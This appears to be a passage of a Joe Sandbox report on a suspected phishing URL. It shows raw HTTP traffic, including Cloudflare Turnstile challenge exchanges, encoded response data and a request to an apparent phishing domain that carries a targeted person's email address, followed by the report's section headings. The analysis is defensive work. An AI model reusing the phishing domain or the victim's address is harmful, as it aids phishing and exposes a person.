2024-06-21 15:59:01 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:01 UTC	438	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:02 UTC	240	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:02 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 89753415d86a4352-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:59:02 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:02 UTC	916	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 2918 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: 1eefe65da7da1cb sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:02 UTC	2918	OUT	Data Raw: 76 5f 38 39 37 35 33 34 30 39 64 64 32 34 63 34 31 33 3d 31 63 33 61 4e 61 30 61 57 4f 43 35 68 58 33 43 58 63 68 57 68 54 68 42 61 37 75 68 63 6d 32 50 43 54 6d 68 5a 45 68 68 49 43 4e 68 4c 37 68 78 43 5a 41 6d 68 31 62 61 25 32 62 48 62 56 33 43 7a 68 77 52 33 43 6e 41 4a 79 33 43 2d 68 47 36 43 43 68 2b 54 30 6d 52 68 68 2d 49 68 73 45 65 78 68 31 68 50 63 68 57 41 50 30 2b 36 68 39 61 6d 58 68 62 61 55 41 49 44 4c 61 44 36 4c 35 4e 69 51 74 32 43 7a 34 33 79 33 43 4f 68 65 65 35 41 77 6d 4e 33 4c 6c 68 68 62 53 6d 77 49 6a 36 50 4d 24 55 4a 59 53 61 68 33 45 36 52 35 32 54 58 57 61 43 2b 42 6d 5a 61 68 6d 63 68 66 4a 2d 48 4d 68 43 47 35 6e 2b 65 79 68 43 4b 68 44 64 4a 68 55 33 71 68 65 36 69 68 43 59 39 78 44 37 68 66 68 43 6b 78 43 36 68 4a 61 6f Data Ascii: v_89753409dd24c413=1c3aNa0aWOC5hX3CXchWhThBa7uhcm2PCTmhZEhhICNhL7hxCZAmh1ba%2bHbV3CzhwR3CnAJy3C-hG6CCh+T0mRhh-IhsEexh1hPchWAP0+6h9amXhbaUAIDLaD6L5NiQt2Cz43y3COhee5AwmN3LlhhbSmwIj6PM$UJYSah3E6R52TXWaC+BmZahmchfJ-HMhCG5n+eyhCKhDdJhU3qhe6ihCY9xD7hfhCkxC6hJao
2024-06-21 15:59:02 UTC	731	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:02 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 124664 Connection: close cf-chl-gen: tmloZHJwIDbU16L69tf6Z8vpEDZsOqJGsois6mWbXCrz2mUN+BWwHIj6yZddUqJMy4Q8SO9YXHMvv1mRFeqpiDOMAPTB8/Se5k+f70BioqN63Ex1RHNYmrk40leRTMvEsIPCBj/FWaTi1IDgn6Fn3GRaaWSZpyvfFRErLICHvUKcjw+aoak6PMEYNdzI13GzA118XnW1XmUnHJW0/D061FL9Y0xGEEf1CRBPO80lU1ZrgA2rWwVjy6nO6/ycPCXav3Lr7s/JCmw4PmFqi4+REh/ftJdPx66yiz6gruDCq5hYyb5OAwDUKoowIiWSAun6A0dt8J6EKrTJ/jkEOV3bJOCdARr+Ir22CQDHe2USlasb7zY7/QEBSIW7MD87MW2bpURbk7pK7dAewdj3EMCMX9AU8eWvJvANeK3mZVmgXYNm6YWiQhf/D5D+HYPrOoDz2RS62/HIdzK9ww7+6AWGEA==$okgRE8NcZedTvJ+cPa2JTg== Server: cloudflare CF-RAY: 8975341689385e86-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:59:02 UTC	638	IN	Data Raw: 67 34 68 46 67 59 2b 50 69 6f 56 6c 58 47 69 57 5a 32 56 57 5a 32 52 52 61 47 6c 70 6a 32 43 61 58 61 4e 66 64 6d 4b 67 65 6d 43 6f 70 6d 69 73 70 6d 47 41 72 58 79 63 66 34 65 32 6f 47 36 4a 74 49 32 35 72 4a 47 74 74 59 6e 44 76 35 5a 37 78 59 48 45 77 6f 57 56 68 35 66 49 6a 61 2b 68 79 35 4c 45 30 74 4c 51 72 6f 76 53 6d 35 76 5a 71 4d 75 72 71 75 44 4f 77 37 7a 51 33 2b 58 56 76 64 6e 64 75 65 37 44 35 4b 6a 79 78 2b 43 6e 37 71 6d 76 39 63 50 51 37 63 6e 38 36 76 48 4e 41 38 4c 78 35 51 66 61 33 67 63 44 76 51 73 4b 32 50 73 43 33 68 54 38 30 75 45 51 7a 74 54 70 38 67 37 77 48 4e 6f 42 39 42 76 31 45 68 50 62 41 65 38 47 2b 52 76 64 47 79 72 33 47 76 73 42 4d 77 67 55 41 44 62 32 37 67 30 37 4e 52 63 33 2b 2f 6a 2b 45 7a 44 36 4d 78 4d 66 52 55 68 Data Ascii: g4hFgY+PioVlXGiWZ2VWZ2RRaGlpj2CaXaNfdmKgemCopmispmGArXycf4e2oG6JtI25rJGttYnDv5Z7xYHEwoWVh5fIja+hy5LE0tLQrovSm5vZqMurquDOw7zQ3+XVvdndue7D5Kjyx+Cn7qmv9cPQ7cn86vHNA8Lx5Qfa3gcDvQsK2PsC3hT80uEQztTp8g7wHNoB9Bv1EhPbAe8G+RvdGyr3GvsBMwgUADb27g07NRc3+/j+EzD6MxMfRUh
2024-06-21 15:59:02 UTC	1369	IN	Data Raw: 35 6b 49 7a 63 70 50 47 39 46 62 7a 31 76 59 56 46 48 64 54 63 34 61 33 55 36 65 31 74 70 55 58 78 59 62 55 4b 43 66 31 70 6d 59 30 70 32 6a 59 31 35 67 31 71 48 54 57 5a 6c 59 58 4e 53 68 35 43 4a 62 4a 69 57 6b 4a 61 63 6f 48 2b 41 58 58 6c 31 6d 33 47 4c 6e 58 56 35 71 58 6d 77 66 4a 4e 74 66 35 36 78 72 62 69 70 73 4a 79 4e 76 59 65 71 75 6f 43 69 73 72 58 44 75 38 4c 46 6c 59 43 57 66 72 75 36 6e 61 66 52 30 4d 76 4a 6b 4d 48 4d 77 4a 4c 54 32 63 57 78 32 39 57 7a 7a 38 2b 77 33 61 54 58 73 63 62 68 75 4f 54 67 77 71 58 76 30 62 44 79 35 38 4f 77 39 2f 48 58 74 50 76 32 32 37 67 41 2b 4e 2b 38 42 50 4c 6a 77 41 6a 7a 35 38 51 4d 2b 4f 76 49 45 41 50 76 7a 42 51 45 38 39 41 59 2b 50 66 55 48 50 6e 37 32 43 44 2b 31 75 33 71 2b 2f 48 63 4a 52 4d 6a 46 Data Ascii: 5kIzcpPG9Fbz1vYVFHdTc4a3U6e1tpUXxYbUKCf1pmY0p2jY15g1qHTWZlYXNSh5CJbJiWkJacoH+AXXl1m3GLnXV5qXmwfJNtf56xrbipsJyNvYequoCisrXDu8LFlYCWfru6nafR0MvJkMHMwJLT2cWx29Wzz8+w3aTXscbhuOTgwqXv0bDy58Ow9/HXtPv227gA+N+8BPLjwAjz58QM+OvIEAPvzBQE89AY+PfUHPn72CD+1u3q+/HcJRMjF
2024-06-21 15:59:02 UTC	1369	IN	Data Raw: 6d 59 32 46 50 4d 32 64 6c 56 45 78 72 61 57 51 76 57 49 42 32 4f 47 4a 54 54 48 4f 42 5a 54 35 2f 68 31 35 45 67 33 35 5a 67 49 78 37 68 59 4b 50 6b 32 47 58 55 49 4a 73 6b 70 64 2f 62 59 35 77 69 31 57 55 6e 35 74 78 70 36 70 30 66 59 52 71 6d 36 75 4a 6b 49 74 6c 6e 58 42 6f 69 61 65 75 64 34 75 6c 73 58 42 34 76 48 79 59 6b 4b 54 41 72 71 4f 63 69 5a 33 4d 6e 71 65 4d 67 63 54 49 75 71 6e 48 6c 63 7a 56 72 4d 32 74 72 37 43 74 31 61 72 59 7a 5a 36 30 7a 37 66 61 33 64 62 49 76 4f 6d 32 34 39 69 39 37 73 6e 49 36 4c 4c 6e 33 74 54 75 38 66 57 79 39 61 2f 37 39 74 50 2b 34 64 50 2b 77 39 33 58 42 50 47 38 43 41 33 33 42 38 59 4b 30 41 7a 66 42 42 44 78 35 78 6b 43 30 4f 30 64 42 74 7a 70 47 75 41 63 38 79 55 44 48 78 63 61 49 52 67 58 41 53 6b 74 44 41 Data Ascii: mY2FPM2dlVExraWQvWIB2OGJTTHOBZT5/h15Eg35ZgIx7hYKPk2GXUIJskpd/bY5wi1WUn5txp6p0fYRqm6uJkItlnXBoiaeud4ulsXB4vHyYkKTArqOciZ3MnqeMgcTIuqnHlczVrM2tr7Ct1arYzZ60z7fa3dbIvOm249i97snI6LLn3tTu8fWy9a/79tP+4dP+w93XBPG8CA33B8YK0AzfBBDx5xkC0O0dBtzpGuAc8yUDHxcaIRgXASktDA
2024-06-21 15:59:02 UTC	1369	IN	Data Raw: 4c 7a 6c 33 4d 54 52 54 52 32 78 4d 67 58 56 2f 67 6e 56 76 4f 55 68 67 59 6c 56 55 5a 45 6c 50 61 46 42 72 6a 55 35 53 54 4a 68 71 63 31 56 72 63 31 53 58 56 58 6d 42 6e 35 70 33 6b 34 39 39 59 4a 57 56 61 35 71 72 68 36 6c 71 62 6e 43 30 68 6f 39 78 69 49 39 77 73 33 47 56 6e 62 75 32 6b 36 2b 33 75 4d 53 2f 75 6e 6d 31 71 5a 36 58 74 61 4b 41 68 6f 2f 52 78 4d 2b 64 78 70 61 70 6a 70 43 34 72 70 6d 33 6d 61 71 63 74 64 4f 79 33 64 2f 50 75 4e 58 4a 76 72 66 56 77 71 44 77 72 2f 48 6b 37 37 33 32 74 73 6d 75 73 4e 6a 4f 75 64 65 35 79 4c 72 36 34 4c 73 46 32 4f 54 53 43 64 33 70 34 41 6f 49 36 41 33 39 38 65 67 4e 30 42 62 52 35 74 59 46 39 52 4c 5a 2b 52 59 68 33 2f 54 68 37 68 66 58 34 76 45 55 39 2b 72 6a 48 53 51 6a 39 79 45 6f 41 50 41 44 4c 68 55 Data Ascii: Lzl3MTRTR2xMgXV/gnVvOUhgYlVUZElPaFBrjU5STJhqc1Vrc1SXVXmBn5p3k499YJWVa5qrh6lqbnC0ho9xiI9ws3GVnbu2k6+3uMS/unm1qZ6XtaKAho/RxM+dxpapjpC4rpm3maqctdOy3d/PuNXJvrfVwqDwr/Hk7732tsmusNjOude5yLr64LsF2OTSCd3p4AoI6A398egN0BbR5tYF9RLZ+RYh3/Th7hfX4vEU9+rjHSQj9yEoAPADLhU
2024-06-21 15:59:02 UTC	1369	IN	Data Raw: 46 46 51 53 31 4d 36 56 30 56 64 66 31 68 54 5a 33 56 58 52 57 4e 36 6b 56 46 73 6c 47 5a 66 55 57 5a 76 55 49 68 77 64 4a 4f 62 6c 6f 6d 62 6c 58 57 54 6f 34 39 77 59 36 4f 4c 65 5a 70 35 68 4b 53 70 70 36 53 46 6f 37 4f 65 62 59 42 32 70 37 65 55 65 4c 36 74 71 71 47 67 6d 37 4f 41 76 58 6e 46 67 4d 4e 39 70 61 33 4c 78 4b 4f 2f 77 36 6d 52 7a 38 50 44 6c 61 36 61 33 4e 79 76 7a 64 53 58 33 39 6a 53 74 4e 6a 6b 76 63 53 68 6f 38 6e 68 77 4d 4c 6c 77 39 2f 69 78 65 50 6a 33 37 2f 79 39 63 33 59 74 64 34 41 79 76 67 42 33 62 6e 31 32 2b 50 30 2b 64 2f 62 2b 50 33 69 41 76 77 43 35 76 4d 42 42 75 6f 45 31 76 44 69 34 76 72 33 35 74 63 66 33 2f 48 68 39 78 45 42 35 43 59 59 38 78 6f 61 4c 68 38 67 48 67 7a 76 4a 43 49 52 43 53 67 6d 49 66 63 73 4b 69 59 52 Data Ascii: FFQS1M6V0Vdf1hTZ3VXRWN6kVFslGZfUWZvUIhwdJOblomblXWTo49wY6OLeZp5hKSpp6SFo7OebYB2p7eUeL6tqqGgm7OAvXnFgMN9pa3LxKO/w6mRz8PDla6a3NyvzdSX39jStNjkvcSho8nhwMLlw9/ixePj37/y9c3Ytd4AyvgB3bn12+P0+d/b+P3iAvwC5vMBBuoE1vDi4vr35tcf3/Hh9xEB5CYY8xoaLh8gHgzvJCIRCSgmIfcsKiYR
2024-06-21 15:59:02 UTC	1369	IN	Data Raw: 56 53 65 49 4b 45 52 47 46 45 62 6b 69 50 59 49 74 39 5a 59 4e 4d 62 47 35 57 69 34 61 58 69 5a 65 47 6e 56 31 54 6c 4a 39 75 6f 33 2b 48 59 6d 65 68 67 32 6d 47 66 4a 79 51 70 47 71 4a 6b 59 35 75 74 36 36 7a 70 59 32 72 64 4a 53 32 66 72 4f 39 6a 36 47 61 65 49 53 48 79 49 4c 48 79 38 32 4d 67 61 6e 43 6e 4b 36 65 73 38 4f 52 70 74 43 54 73 63 2f 49 6c 64 2f 41 32 38 32 31 30 35 79 38 33 71 62 62 35 62 66 4a 77 71 54 44 72 2f 43 71 37 2b 2f 50 73 66 6a 4d 2b 73 37 38 30 50 37 53 41 64 51 44 31 67 58 59 42 39 6f 4a 33 41 76 65 44 65 41 50 34 68 48 6b 45 2b 59 56 36 42 66 71 47 51 73 59 44 68 48 63 30 2b 38 50 41 64 76 31 44 79 59 68 42 52 50 6e 47 76 33 36 42 79 51 61 2b 69 6b 65 37 67 63 4f 41 78 49 6c 4f 68 45 50 4a 79 59 65 4a 77 38 67 4d 53 34 6b 2f Data Ascii: VSeIKERGFEbkiPYIt9ZYNMbG5Wi4aXiZeGnV1TlJ9uo3+HYmehg2mGfJyQpGqJkY5ut66zpY2rdJS2frO9j6GaeISHyILHy82MganCnK6es8ORptCTsc/Ild/A282105y83qbb5bfJwqTDr/Cq7+/PsfjM+s780P7SAdQD1gXYB9oJ3AveDeAP4hHkE+YV6BfqGQsYDhHc0+8PAdv1DyYhBRPnGv36ByQa+ike7gcOAxIlOhEPJyYeJw8gMS4k/
2024-06-21 15:59:02 UTC	1369	IN	Data Raw: 36 67 33 6c 47 66 59 35 6a 67 58 4a 52 6a 6e 69 4f 6a 33 42 7a 57 6f 2b 4a 6e 49 74 2f 58 6c 56 6a 6d 57 2b 50 6e 4b 43 61 6d 32 64 37 6e 6f 61 44 68 34 4f 63 6e 4b 69 53 6f 71 4a 32 6a 4c 79 57 73 36 6d 4b 73 71 31 2b 6c 4c 4f 6c 6d 4c 36 32 77 62 36 56 69 58 2b 38 79 35 72 4c 73 4d 7a 56 31 5a 47 70 31 73 65 7a 74 70 62 57 71 65 43 79 72 36 43 31 72 4f 4c 58 75 63 53 38 36 75 53 35 36 72 6a 77 75 36 71 77 78 62 7a 76 7a 39 4b 79 38 73 50 54 75 63 57 77 2b 65 44 30 2f 66 76 68 33 72 34 4a 2f 67 50 66 33 66 76 45 35 4f 6a 4f 42 41 66 63 42 65 55 48 44 77 63 53 45 42 58 5a 35 39 6e 7a 48 77 77 55 38 78 33 6c 37 69 54 7a 2f 51 72 31 4b 42 63 67 41 68 6b 46 4d 77 38 45 4d 77 45 51 39 51 4c 73 4e 68 30 78 4f 6a 67 65 47 2f 70 46 4f 7a 38 63 47 6a 67 42 49 53 Data Ascii: 6g3lGfY5jgXJRjniOj3BzWo+JnIt/XlVjmW+PnKCam2d7noaDh4OcnKiSoqJ2jLyWs6mKsq1+lLOlmL62wb6ViX+8y5rLsMzV1ZGp1seztpbWqeCyr6C1rOLXucS86uS56rjwu6qwxbzvz9Ky8sPTucWw+eD0/fvh3r4J/gPf3fvE5OjOBAfcBeUHDwcSEBXZ59nzHwwU8x3l7iTz/Qr1KBcgAhkFMw8EMwEQ9QLsNh0xOjgeG/pFOz8cGjgBIS
2024-06-21 15:59:02 UTC	1369	IN	Data Raw: 6a 31 52 76 53 47 70 52 55 6c 68 71 6c 46 31 56 6d 32 71 4c 6a 6c 57 6b 6a 33 43 6b 71 47 4e 70 70 32 75 75 66 57 36 66 69 37 4b 30 66 37 56 78 68 34 2b 36 69 58 65 50 63 37 36 4f 6b 6e 2b 57 6d 35 65 7a 74 48 32 63 6f 4b 71 4c 67 70 32 38 78 38 72 51 6e 73 2b 65 6f 4a 61 6f 6d 4e 72 54 6d 73 79 32 74 4f 43 73 71 35 32 7a 31 75 50 56 33 71 66 6d 75 39 6e 4d 34 73 48 59 72 65 7a 51 33 72 50 31 79 50 6a 53 37 2b 58 47 37 74 4f 36 30 50 6a 66 76 39 48 7a 35 4d 4b 2f 78 62 76 35 35 2b 6f 46 43 77 6b 48 35 73 6b 56 41 39 48 68 34 77 6e 72 43 76 4c 61 35 52 55 4f 38 42 76 31 44 65 45 68 42 52 50 6e 4b 76 77 74 42 79 51 61 2b 69 4c 6a 37 76 34 66 38 41 6a 76 4a 41 6e 33 4e 43 30 63 39 44 6e 39 44 50 30 59 51 79 59 41 52 30 45 4b 46 45 68 4a 47 30 63 35 53 51 34 Data Ascii: j1RvSGpRUlhqlF1Vm2qLjlWkj3CkqGNpp2uufW6fi7K0f7Vxh4+6iXePc76Okn+Wm5eztH2coKqLgp28x8rQns+eoJaomNrTmsy2tOCsq52z1uPV3qfmu9nM4sHYrezQ3rP1yPjS7+XG7tO60Pjfv9Hz5MK/xbv55+oFCwkH5skVA9Hh4wnrCvLa5RUO8Bv1DeEhBRPnKvwtByQa+iLj7v4f8AjvJAn3NC0c9Dn9DP0YQyYAR0EKFEhJG0c5SQ4
2024-06-21 15:59:02 UTC	1369	IN	Data Raw: 6e 47 48 6c 6d 70 70 6c 57 74 65 6f 58 56 30 62 33 69 6e 59 56 75 6a 69 4b 47 61 67 70 2b 71 61 4b 71 43 6a 48 4b 6d 6b 59 61 77 74 72 4f 76 71 48 58 41 6f 4c 71 58 6c 62 4e 38 6e 4b 44 48 6f 4a 75 35 71 6f 6e 47 73 4d 62 45 79 73 48 49 31 71 6e 41 6c 64 53 34 78 70 76 64 73 4f 43 36 31 38 32 75 33 4b 2f 66 35 38 62 48 76 4e 50 69 76 75 6a 76 71 61 50 72 30 4f 6e 69 79 75 66 79 73 50 4c 4b 31 4c 6e 4d 2b 2f 44 67 38 72 76 73 33 64 44 62 31 4e 58 54 77 39 37 6d 34 75 6a 6a 41 41 62 46 33 41 66 74 46 75 50 72 43 64 54 30 47 2f 49 65 36 2f 4d 52 33 50 77 6a 2f 50 76 30 49 65 59 70 4a 52 37 32 47 65 6b 70 4a 79 51 54 4c 67 45 68 44 54 55 34 4e 50 51 66 2b 45 45 52 4f 78 67 57 4e 50 77 64 48 77 63 38 49 45 30 37 51 79 77 48 50 6b 70 4c 4a 54 34 49 56 45 35 53 Data Ascii: nGHlmpplWteoXV0b3inYVujiKGagp+qaKqCjHKmkYawtrOvqHXAoLqXlbN8nKDHoJu5qonGsMbEysHI1qnAldS4xpvdsOC6182u3K/f58bHvNPivujvqaPr0OniyufysPLK1LnM+/Dg8rvs3dDb1NXTw97m4ujjAAbF3AftFuPrCdT0G/Ie6/MR3Pwj/Pv0IeYpJR72GekpJyQTLgEhDTU4NPQf+EEROxgWNPwdHwc8IE07QywHPkpLJT4IVE5S

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:02 UTC	851	OUT	GET /favicon.ico HTTP/1.1 Host: venicuttnortheastusa.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://venicuttnortheastusa.com/?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
2024-06-21 15:59:02 UTC	122	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 21 Jun 2024 15:59:12 GMT Connection: close Transfer-Encoding: chunked
2024-06-21 15:59:02 UTC	33	IN	Data Raw: 31 36 0d 0a 3c 68 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 68 31 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 16<h1>Access Denied</h1>0

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:04 UTC	487	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:04 UTC	375	IN	HTTP/1.1 404 Not Found Date: Fri, 21 Jun 2024 15:59:04 GMT Content-Type: application/json Content-Length: 7 Connection: close cf-chl-out: 2RwOJ4Ux3+souhlQLR6dkg==$GhVKVMbytRzdd80NyvIs4Q== cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 89753425af83c3f8-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:59:04 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:04 UTC	775	OUT	GET /cdn-cgi/challenge-platform/h/b/i/89753409dd24c413/1718985542215/NHJ4YjgTp1IBEyq HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:05 UTC	200	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:05 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 897534282e9072b7-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:59:05 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 06 00 00 00 35 08 02 00 00 00 ed 40 0d 1c 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR5@IDAT$IENDB`

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:05 UTC	804	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/89753409dd24c413/1718985542216/9dfeb1619e2d4256adeded2d3a314ce177c6630fc10756bc799dd97c0ee0fe89/kMSECQtSKPC8EFA HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:06 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Fri, 21 Jun 2024 15:59:05 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close
2024-06-21 15:59:06 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 6e 66 36 78 59 5a 34 74 51 6c 61 74 37 65 30 74 4f 6a 46 4d 34 58 66 47 59 77 5f 42 42 31 61 38 65 5a 33 5a 66 41 37 67 5f 6f 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gnf6xYZ4tQlat7e0tOjFM4XfGYw_BB1a8eZ3ZfA7g_okAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
